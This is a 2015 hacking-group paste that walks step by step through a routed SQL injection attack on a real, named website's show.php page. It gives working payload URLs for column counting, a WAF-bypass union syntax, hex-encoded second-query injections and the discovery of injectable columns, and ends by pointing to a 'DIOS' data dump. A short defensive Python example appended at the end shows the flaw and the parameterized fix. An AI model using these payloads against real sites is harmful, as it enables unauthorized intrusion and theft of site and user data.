Kyfx

SQLi for noobs explanation, ty K!NG_H

Sep 2nd, 2015
ASSALAM O ALAIKUM

K!NG_H IS HERE From "PAK MAD HUNTER'S"

TOPIC: ROUTED SQL INJECTION

Today I will explain Zeeshan Mughal's challenge and its solution in detail. Hope you enjoy :D

Target: http://www.onlinepost.in/show.php?page=39

The first part is the same as on other sites: start with order by.

http://www.onlinepost.in/show.php?page=39 order by 5--

This gives an error, which means there are 4 columns.

Now do the union select:

http://www.onlinepost.in/show.php?page=.39 union select 1,2,3,4--
403 error. I use this to bypass it: union(Select(1),(2).....--+-

http://www.onlinepost.in/show.php?page=.39 union(select(1),(2),(3),(4))--+

No error, but the page does not show a vulnerable column :/

Sometimes we need to route our injection to the second query by injecting the first one.
So I inject my first query like:
www.example.com/event.php?id=.2 union select 0x3127,2,3--
0x3127 is the hex value of 1'
We do the same thing with every column number and watch how many columns give an error.

So now I apply the above method:

http://www.onlinepost.in/show.php?page=.39 union(select(0x3127),(2),(3),(4))--+

http://www.onlinepost.in/show.php?page=.39 union(select(1),(0x3227),(3),(4))--+

I did the same thing with every column number,
and I got an error only in column number 1.

Now I route the second query, which means I inject my first query through column number 1,

like, e.g., union(select("' order by 1#"),(2),(3),(4))--+
Convert ' order by 1# to its hex value and then enter it:
http://www.onlinepost.in/show.php?page=.39 union(select(1),(0x3227),(3),(4))--+

http://www.onlinepost.in/show.php?page=.39 union(select(0x27206f72646572206279203123),(2),(3),(4))--+
The page opens normally with no error, which means our method worked :D

Just increase the number in the hex value until you get an error.

http://www.onlinepost.in/show.php?page=.39 union(select(0x27206f7264657220627920313223),(2),(3),(4))--+

I get an error on number 12. That means there are 11 columns.

Now the union statement in the second query :D

http://www.onlinepost.in/show.php?page=.39 union(select(0x2720616e64203020756e696f6e2073656c65637420312c322c332c342c352c362c372c382c392c31302c313123),(2),(3),(4))--+

' and 0 union select 1,2,3,4,5,6,7,8,9,10,11#
I converted it to its hex value and ran it.
The query worked :D
Got vulnerable columns "3,5,6,7,9"

Now let's use DIOS and finish the game :D

DONE :D

Hope you all understand it.
If I made any mistake, please forgive me.
Thanks to ZEESHAN MUGHAL for the web link :D
ALLAH HAFIZ

./logout
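
The root cause behind the walkthrough above, as an added example that is not part of the original paste: a value returned by the first query is concatenated into a second query, and binding it as a parameter closes that hop. It uses Python's sqlite3 with constructed data; the tables, columns and function names are hypothetical and are not the target's real schema.

```python
import sqlite3

def make_db():
    """Constructed in-memory data; all table and column names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages(cat TEXT, a INT, b INT, c INT);
        CREATE TABLE posts(cat TEXT, title TEXT);
        INSERT INTO pages VALUES ('news', 2, 3, 4);   -- rowid 1, ordinary row
        INSERT INTO pages VALUES ('1''', 2, 3, 4);    -- rowid 2, cat is the 2 chars 1'
        INSERT INTO posts VALUES ('news', 'hello');
    """)
    return db

def show_vulnerable(db, page):
    # Query 1: the request parameter is concatenated into the SQL text.
    row = db.execute(
        "SELECT cat, a, b, c FROM pages WHERE rowid = " + page).fetchone()
    if row is None:
        return []
    # Query 2: column 1 of query 1 is trusted and concatenated again, so
    # whatever query 1 returns in that column is parsed as SQL here.
    return db.execute(
        "SELECT title FROM posts WHERE cat = '" + str(row[0]) + "'").fetchall()

def show_hardened(db, page):
    # Reject anything that is not a plain integer id before touching the DB.
    if not page.isdigit():
        return []
    # Both queries bind their inputs, including the value read back from query 1.
    row = db.execute(
        "SELECT cat, a, b, c FROM pages WHERE rowid = ?", (int(page),)).fetchone()
    if row is None:
        return []
    return db.execute(
        "SELECT title FROM posts WHERE cat = ?", (row[0],)).fetchall()

def second_query_breaks(db, page):
    """True when the value from query 1 makes the vulnerable query 2 fail to parse."""
    try:
        show_vulnerable(db, page)
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    db = make_db()
    print(show_vulnerable(db, "1"), second_query_breaks(db, "2"))
    print(show_hardened(db, "1"), show_hardened(db, "2"))
```

Parameterizing only the first query is not enough: any value read back from the database and reused in another statement has to be bound as well.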